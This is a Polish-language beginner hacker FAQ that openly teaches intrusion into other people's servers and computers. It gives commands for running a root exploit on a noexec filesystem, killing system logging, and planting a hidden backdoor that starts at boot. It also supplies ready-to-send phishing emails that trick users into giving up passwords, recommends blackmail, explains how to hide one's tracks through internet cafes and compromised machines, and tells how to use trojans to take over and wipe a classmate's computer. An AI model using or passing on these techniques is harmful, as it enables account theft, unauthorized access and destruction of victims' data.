
                                O Aut0rz3

              ***********************************************
              *                   kAczan                    *
              *       e-mail: kaczan@net.e.pl               *
              *          http://www.cyber-punks.prv.pl      *
              *   #nysa  #hackpl  #hackingpl  #hacking-pl   *
              *               kAczan faq v1.0               *
              *                                             *
              ***********************************************


 ============================ Ostrzezenie !!!!!!!! ========================= 

 Oczywiscie ten text jest to przypadkowy zbior kilku tysiecy liter,
 ktore spojna calosc tworza zupelnie przypadkowo. Ja tylko wciskalem klawisze.
 A tak pozatym to nie Dajcie sie zlapac, a jak juz was zlapia to powiedzcie
 ze jestescie chorzy na mozg i nic wam nie zrobia (albo powiedzcie ze was
 porwalo UFO [to moja rodzina] wtedy na pewno wam uwierza).
 
----[ CYBERTECH ]-----------
------------------------------------------
Sorry kAczan, ale musialem przeformatowac bez twojej wiedzy caly FAQ, gdyz 
tak go skonstruowales, ze nie dalo sie go czytac nawet w roz. 800x600. 
--
Leho
----------------------------------------------------------------------------




############################### Spis tresci #################################

1. Netykieta hackera
2. Jestem lamerem, co mam robic ?
3. Hackowanie stron (w wielkim skrocie)
      3a. Zbieranie informacji
      3b. Exploit
      3c. SOCIAL
      3d. Nie dac sie zlapac
4. Backdoor
5. Trojany
6. Skanery
7. The End

#############################################################################



---------------------------
1. Netykieta hackera
---------------------------

        A wiec wiem ze w necie sa setki (100), tysiace (1.000) a nawet 
miliony (1.000.000) textow o netykiecie, ale co z tego, skoro wiekszosc z was jej nie 
przestrzega. nie bede tu pisal wszystkiego, ale napisze rzeczy
najwazniejsze. a wiec:

   * nie powinno sie chwalic ze jest sie hackerem, zanim niczego wielkiego 
     nie zrobisz. po co masz sie reklamowac ? jak bedziesz slawny to ludzie 
     sami to ciebie sie zglosza i WTEDY bedzieszhackerem
     
   * nie wolno krzywdzic niewinnych (gwalcic i molestowac sexualnie tez). co 
     ci sa winni niewinni. Znam goscia (nick: Pan0rzech27), ktorzy chodza po 
     kawiarenkach internetowych i patrza czy gdzies nie jest Windows 
     Commander. jak jest to go wlancza i spr. ostatnie polaczenie, ma haselko 
     i login. a potem to juz kilka sekund i gosciu ma na koncie 
     ROZPIERDZIUCHE (tu ostrzezenie dla was: jak jestescie w kawiarence albo 
     u kumpla to ZAWSZE musicie sie wylogowac, bo potem przyjdzie taki 0rzech 
     i zrobi ci CHoJOZe).
     
   * hacker hackerowi nie rowny. kiedys matka mnie spytala po co pisze te 
     faq'i. odpowiedzialem ze w ten sposob dziele sie wiedza z innymi. na to 
     moja stara: to po co sie dzielisz, zostaw se tom wiedzem dlam siebiem. 
     zatkalo mnie, ale teraz mam na to odpowiedz. skoro ja uczylem sie na 
     cudzych txt i faq, to ludziom ktorzy napisali te faqi jestem co winny. 
     I piszac moje wlasne faqi, splacam ten dlug.
     
   * coraz czesciej widze jak jeden hacker na drugiego kapuje. ludzie, 
     jestesmy hackerami, powinnismy trzymac sie razem i sobie nawzajem 
     pomagac, a nie lac sie jeden przez drugiego. Chociaz jestem w stanie 
     zrozumiec prywatne porachunki (np. kAczan vs Pan0rzech27).

Tutaj tylko leciutko poruszylem temat netykiety. jak chcecie wiecej to na 
necie jest tego w (c)hu.....


----------------------------------------
2. Jestem lamerem, co mam robic ?
----------------------------------------

        Mhm....... przede wszystkim czytac faqi. to w nich znajduja sie 
najczesciej zadawane pytania i dlatego sprawdzaja sie najlepiej. pozatym 
czytam  texty, sa cholernie wazne (w koncu teoria tez sie liczy). nalezy 
czytac tez newsy (to dzieki nim dowiesz sie o nowych dziurach, hackerach, 
programach, wlamach). no i oczywiscie jakies ksiazki.
        jezeli korzystasz w Windy, to radze przesiasc sie na Linuxa. poczatki 
sa trudne, ale jak ujrzysz skutki to sie sam zdziwisz. a tak wogole to 80% 
serwerow siedzi na Linuxie, majac winde wlamujesz sie na calkiem obcy teren, 
a to ci wcale nie pomaga. pozatym pochodz po stronach i nawiaz jak najwiecej 
kontaktow z DOBRYMI hackerami. mozesz tez zajrzec na jakies zhaczone strony, 
zobaczyc strone i autora zhackowania. potem poszukaj jego maila i spytaj sie 
jak to zrobil (90% kaze ci sie odpierdolic, 5% splawi cie, 4% nasciemnia cie, 
1% nie odpisze ----- wiem to z doswiadczenia) ale szansa zawsze jest. 
istnieja takze grupy mailingowe (np. hackpl, LameHelp). jest takze taka 
mozliwosc, ze z jakims problemem zglos sie na jakies forum, poczekaj, a odp. 
sama przyjdzie do ciebie (chociaz czasem nie bedzie miala nic wspolnego z 
tematem).


----------------------------------------------
3. Hackowanie stron (w wielkim skrocie)
----------------------------------------------

        A wiec tak. hackowanie stron polega na doglebnym szperaniu na 
serwerze i szukaniu dziur (to jest to co mnie rusza). jest masa drog dzieki 
ktorym mozna zhaczyc strone: exploit, SOCIAL, sniffing, snoofing, etc.
tutaj opisze sposob taki: zbieram dane o serwerze, szukam exploita, 
uruchamian, hackuje.

        3a. ZBIERANIE INFORMACJI O SERWERZE. mozna to przeprowadzic na wiele 
sposobow. mozesz wyslac adminowi maila, z prosba aby podal ci ich os, 
antyvirus, firewall, routery etc (ale raczej ci ich niepoda [czyt. admin to 
taki sqrwiel ktory nigdy tego ci nie poda]). innym sposobem jest 
przeskanowanie serwera i przeanalizowanie tego co otrzymamy. jeszcze innym 
sposobem jest finger (tak lamerska rzecz ze nie chce mi sie tlumaczyc). 
mozemy rowniez wyslac maila na adres bleblebleble@nazwa.serwera.pl ----- 
takiego maila nie ma wiec serwer wroci nam tego maila, ale w plikach 
naglowkowych bedzie kilka waznych dla nas informacji. wszystkie uzbierane 
informacje nalezy zpisac, przydadza sie przy doborze exploita.

        3b. EXPLOIT. exploit to taki programik, dzieki ktoremu mozemy dostac 
z poziomu zwyklego urzytkownika uprawnienia roota. teraz sa potrzebne inf. 
ktore wczesniej zebrales. jak juz je masz to szukasz exploita, ktory bedzie 
odpowiadal danym ktore zebralismy. jest masa stron ktore oferuja exploity 
wiec poszukaj sam. jak juz mamy odpowiedniego exploita, to laczysz sie ze 
swoim kontem na haczonym serwie, uruchamiasz exploita i jestes adminem. 
gorzej jest jak haczys serwer gdzie nie masz kata (w takim przypadku 
proponuje zalozyc tam konto, albo wyhaczyc jakies lamerskie kato i dopiero 
wtedy uruchom exploita). teraz bardzo czesto sie zdarza ze admin odebral nam 
mozliwosc uruchamiania naszych wlasnych programow. w tym wypadku normalne 
uruchomienie exploita nie podziala. ale jest na to sposob, mianowicie:

chacker@ofiara.org~$ gcc sploit.c
      chacker@ofiara.org~$ ./a.out
      bash: ./a.out: Brak dost�pu
      chacker@ofiara.org~$ /lib/ld-linux.so.2 ./a.out
      sploit running...

jak widac uruchimilismy exploita w filesystem NOEXEC, a na admina lejemy.

        3c. SOCIAL. innym sposobem na zhaczenie serwera jest zastosowanie 
SOCIAL'a. chodzi w tym o to, aby tak wyhujac wlasciciela konta, aby ten sam 
dal nam haselko do swojej strony. najlepiej wyslij tego maila jakiemus
lamerowi i haselko samo to ciebie przyleci:

                            ----CUT HERE---
                            
from: <www-admin@serwer.pl>
rcpt to: <frajer@serwer.pl>
subject: Uwaga!!! Zmiany w systemie !!!

 Uprzejmie informujemy uzytkownikow serwera serwer.pl,ze z dniem
20.03.2001 wprowadzony zostanie do uzytku nowy system kryptowania hasel
w standardzie "IBM-DES IV", dzieki czemu zwiekszy sie bezpieczenstwo naszego
serwera.Jako ze hasla w /etc/shadow sa w postaci zakodowanej ,uprasza sie
uzytkownikow o przeslanie SWOICH hasel na adres www-admin@serwer.pl w celu
sprawdzenia ich zgodnosci z nowymi zakodowanymi wpisami.Niezastosowanie sie
do powyzszego moze (z powodu niekompatybilnosci DES II z DES IV) uniemozliwic
korzystanie z konta www po 04.04.2001.Za wszelkie niedogodnosci przepraszamy.

Administrator serwera
Jaroslaw "pedzio" Piastka
www-admin@serwer.pl

                              ---CUT HERE---

albo jeszcze inne:

                              ---CUT HERE---
From: sys-admin@serwer.pl
Rcpt to: frajer@serwer.pl
Subject: Informacje na temat serwisu serwer.pl.

Z powodu czesto powtarzajacych sie przypadkow posiadania wielu kont
przez jedna osobe doszlismy do wniosku ze nalezy przeprowadzic ponowna 
weryfikacje danych uzytkownikow, jezeli chcesz jeszcze korzystac ze swojego 
konta musisz na adres: help@serwer.pl wyslac dane (chociazby zblizone) do 
tych ktore podales w formularzu. Oraz koniecznie musi tam tez byc haslo ktore 
chcesz posiadac i twoj login-name. Konto zostanie uaktywnionie w ciagu 15 
minut w dzien, lub nastepnego dnia po otrzymaniu poczty.
Z gory przepraszamy za wynikle z tego powodu problemy.

 Administracja serwer.Pl
                                           
                               ---CUT HERE---

        Jak juz masz haselko to hackujesz. pozatym w SOCIALU bardzo wazny 
jest szantaz. musisz napisac lamerowi, ze jak nie poda hasla to jego konto 
przestanie dzialac.

        3d. NIE DAC SIE ZLAPAC. oczywiscie normalne jest ze jak zjebiesz cos 
powaznego to admin i tpsa beda cie scigac. jest kilka sposobow na maskowanie 
sie w sieci:

   * wlamuj sie z kawiarenki internetowej (najlepsze). masz PEWNOSC ze cie 
     nie zlapia. nawet jak juz dojda do kawiarenki to i tak gowno maja. 
     przeciez w kawiarence jest masa ludzi
     
   * wlam od kumpla. tu wazne jest aby kumpel nie widzial wlamu (in. cie 
     sypnie). najlepiej zeby kumpel nie wiedzial ze wogole u niego bylismy
     
   * ze swojego kompa przejmij jakis inny komputer i topiero z niego rob 
     wlam. w rzeczywistosci to wcale nie jest takie trudne !!!!!!!
   
   * jezeli strone zhaczyles SOCIALEM to zawsze mozesz skorzystac z takiej 
     wymowki, "przeciez lamer sam mi dal swoje haslo!!! ja nic nie kradlem"
   
   * a tak pozatym to jak chaczysz cos malego to adminowi nawet nie bedzie 
     sie chcialo ruszyc dupy zeby cie namierzyc
   
   * zamiast laczyc sie przez tpsa polacz sie przez cos innego. bardzo 
     mozliwe ze i tak cie namierza, ale ten trik ich bardzo spowolni 
     (najlepiej to korzystaj z czegos innego, a to uruchom na wszelki wypadek)
   
   * dla zaawansowanych = wlam sie do tpsa i poszperaj w tabelach 
     przydzielania ipekow. np. ustaw ze to nie ty sie wlamywales ale nasz 
     szanowy pan(i) prezydent Aleksander Kwasny
   
   * istnieje cos takiego jak gateway. program binduje sie na jakims 
     serwerze, a ty sobie chodzisz polaczony tym programem po roznych 
     serwerach. na koniec wchodzisz na atakowany serwer iiiiiii....... nie ma 
     dowodow ze to akurat TY haczyles strone (wiecej na ten temat = sAmkO)
   
   * poszperaj przy serwerze proxy
   
   * wejdz na www.anonymizer.com (strone ktora oferuje BEZPIECZNE zwiedzanie 
     stron) i zrob kilka takich petelek miedzy serwerami ktore oferuja 
     anonimowosc
   
   * jezeli przy haczeniu uzyskales prawa roota to po prostu wpisz:
     root@localhost~# killall -9 syslogd klogd
     teraz sprawdz /etc/syslog.conf ------ mozliwe ze logi ida na inny serwer 
     lub na inne konto uruchom jakiegos killog'a (pamietaj ze niewazne 
     jakiego programu uzywasz przy wlamywaniu sie, to zawsze go kasuj [razem 
     ze zrodlem])

uff....... troche tego bylo

----------------------------
4. Backdoor
----------------------------

        Jezeli juz jestes na serwerze (i masz roota) to nie zawsze musisz 
haczys strone albo robic ROZPIERDZIUCHE. mozesz zalozyc bardzo pozytecznego 
backdoora. for lamer: jest to program, ktory binduje sie na jakims porcie 
(najlepiej zeby byl to egzotyczny port) i czeka na polaczenie. jak sie 
polaczysz (oczywiscie wymaga to loginu i hasla [ktore ustalasz ty] daje ci 
roota). w ten sposob mozesz dlugo nekac ofiare.
skad wziasc backdoora: jest tego w huja na necie (np. http://samko.20m.com). 
jak zalozyc backdoora (na przykladzie backdoora z samko.20m.com):

     root@localhost~# gcc backdoor.c -o .me
     root@localhost~# rm backdoor.c;cp .me /etc
     root@localhost~# touch -r /bin/bash /etc/.me --> powoduje to ze /etc/.me 
                                                   dostaje taka date dostepu
                                                   jak /bin/bash
                                                    
     root@localhost~# echo "/etc/.me&" >> /etc/rc.d/rc.local ---------> 
                                                   dopisuje backdoora do 
                                                   pliku rc.local komendy w 
                                                   nim zapisane wykonywane sa
                                                   przy kazdym starcie systemu

opisalem tu totalne minimum jezeli chodzi o backdoory (wiecej = Neferith)


----------------------------
5. Trojany
----------------------------

        Mhm......... jezeli nie wiesz to co to jest trojam to prosze: usun 
tego faqa, usun go z kosza, wlacz DOS'a, wpisz format c:/q i potwierdz.
        pewno niejeden z was (czytajac tego faqa) dziwi sie dlaczwego opisuje 
tu tak oczywiste rzeczy jakimi sa trojany. oto bardzo czesto ludzie (niby 
hackerzy) trudza sie jak huj nad czyms, co trojan zalatwi w 5 min (i wcale 
nie robia tego dla tego ze nie chce isc na latwizne, po prostu ich wiedza 
jest ograniczona i nie wiedza ze trojan to moze szybciej). na rynku jest 
sporo trojanow np. sub7, NetBus, Skun, GirlFriend.
        wykorzystanie: kumpel z klasy wqrwia mnie tak, ze juz nie moge 
wytrzymac. wysylam mu mailem patcha od trojana (gosc sie troche zna na 
kompach, wiec patcha wbindowalem w jakis program .exe). tak sie jeszcze fajnie
sklada ze gosc ma lacze stale. uruchamian trojana, wpisuje Ip goscia i hujam 
mu po dysku.

teraz odpowiem na czesto zadawane pytania na temat trojanow:

        JAK MAM WYKORZYSTAC TROJANA PRZY ZLACZU MODEMOWYM ? mhm....... mam 
rozwiazanie. jest taki trojan o nazwie Skun (o ile sie nie myle to jego 
strona to www.skun.backdoor.prv.pl). trojan ten ma funkcje wysylania maila 
przy kazdym wchodzeniu do netu. za pierwszym razem goscia sam musisz zczaic, 
ale potem jest latwo, bo wlanczasz funkcjie wysylania maila i czekasz na 
maila. jak gosciu bedzie sie laczyl z netem do na twoj adres wyslany zostanie 
mail. potem szybko sprawdz IP skad przyszedl mail i masz goscia w reku.

        CZY ISTNIEJE JAKIS TROJAN KTORY POTRAFI FORMATNAC DYSK ? 
        tak jest = Skun v0.11
        
tak wogole trojany maja zajebiste funkcje, trzeba tylko do nich trafic. 
opisze tu kilka fajnych funkcji roznych trojanow:


  formatowanie dysku                  = Skun v0.11
  uruchomienie jakiegos virusa        = Skun v0.11
  zbindowanie patcha z programem .exe = sub7
  uruchomienie fajnego skryptu IRC    = Skun v0.11
  mail-bomber z przejetego kompa      = Skun v0.11
  proba wyciagniecia hasla do e-maila = Skun v0.11
  proba wyciagniecia hasla do www     = Skun v0.11 <-- po co godzinami meczyc 
                                   sie nad serwem, skoro mozna sprobowac tego)
  przejecie jakiegos kompa a nastepnie z przejetego kompa przejac jeszcze 
  jeden = NetBus

.......konczac sprawe trojanow .................. (nie wiem co 
wymyslic).................

--------------------------
6. Skanery
--------------------------

        Skanery sa to programy dzieki ktorym mozna przeskanowac dany serwer 
(lub pojedynczy host) i znalezc w nim jakas dziure. skaner pokazuje nam 
otwarte porty, bledy w konfiguracji, OCZYWISTE dziury i wiele innych
(zalezy to od uzywanego skanera). nie bede tu zbytnio duzo pisal, po prostu 
wlanczasz skanera, wpisujesz skanowanego hosta, pod jakim wzgledem ma 
skanowac i juz. teraz omowie poszczegolne skanery i opisze ich funkcje:

   ISS         = posiada intuicyjny interfejs X i wiele modulow z opisami 
                 nowych atakow (atak typu DoS, zalewanie pakietami SYN, bomby 
                 czasowe)

   Nessus      = jest to dostepny za darmo i niezwykle wszechstronny skaner. 
                 Nessus wchodzi na Winde, Linuxa i Unixy. Nessus obsluguje 
                 ok. 210 znanych atakow
         
   nmap        = specjalizuje sie w skanowaniu otwartych portow (i to wieloma 
                 technikami)
       
   CGI scanner = skanuje zdalne hosty WWW w poszukiwaniu niebezpiecznym 
                 plikow CGI

   trojan.pl   = skaner ktory skanuje host i pokazuje dziury dzieki ktorym   
                 mozna latwo umiescic trojana

   spoofscan   = program podmienia adres, z ktorego nastepuje skanowanie

   xscan       = sluzy do szybkiej oceny bezpieczenstwa serwera X

   COPS        = wyszukuje w systemie typowe bledy konfiguracyjne, luki 
                 i ostrzerzenia, nieprawidlowe prawa dostepu do plikow i 
                 katalogow, slabe hasla, bledy zwiazane z bazami hasel, 
podejrzane zmiany w sumach kontrolnych plikow.
pragne zaznaczyc ze COPS jest skanerem systemowym !!!!!

---------------------------
7. The End
---------------------------

        nareszcie. ty to czytales, a ja musialem to pisac. jakidac po 
przeczytaniu tego faqa ogolnie zajmuje sie haczeniem (nie w sensie zhaczyc 
strone, ale w sensie zhaczyc strone, poczytac maile roota,przelac na swoje 
konto 1.000$, a MOZE po drodze spotkam jakies dziwki?). jest to muj pierwszy 
faq (v1.0), wiec juz niedlugo powinno sie pojawic uaktualnienie (upgreate). 
jak masz cos co moglbym tu wrzocic to wal smialo. wiem ze ten text jest moze 
troche pokrecony, ale cale hackerstwo jest pokrecone jak sloiki na zime.
byebyebyebye........................................ (acha, zapomnialbym, 
przy pisaniu tego faqa wypilem jedna kawe CAPPUCCINO [orzechowom]).

                                                       cdn.

              *****************************************
              * GREETZ GOES TO.....  GREETZ GOES TO...*
              *                                       *
              *   / sAmkO / Neferith / deefes /       *
              *   / HyDrAuLiK / u0p /                 *
              *****************************************


           ***********************************************
           *                   kAczan                    *
           *       e-mail: kaczan@net.e.pl               *
           *          http://www.cyber-punks.prv.pl      *
           *   #nysa  #hackpl  #hackingpl  #hacking-pl   *
           *               kAczan faq v1.0               *
           *                                             *
           ***********************************************

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^
                    faq pisany przy plycie SKULL & BONES zespolu CYPRESS HILL
